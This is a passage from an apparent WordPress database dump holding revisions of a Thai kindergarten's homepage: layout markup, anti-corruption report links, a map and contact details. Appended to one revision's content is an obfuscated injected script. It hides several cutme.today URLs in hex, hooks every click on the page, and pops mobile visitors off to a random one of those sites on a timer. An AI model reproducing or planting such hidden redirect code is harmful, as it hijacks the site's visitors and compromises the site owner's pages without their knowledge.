900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 11:45:17','2024-08-28 04:45:17','',19,'http://watprato.ssk.in.th/?p=245',0,'revision','',0),
(246,2,'2024-08-28 12:14:06','2024-08-28 05:14:06','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid 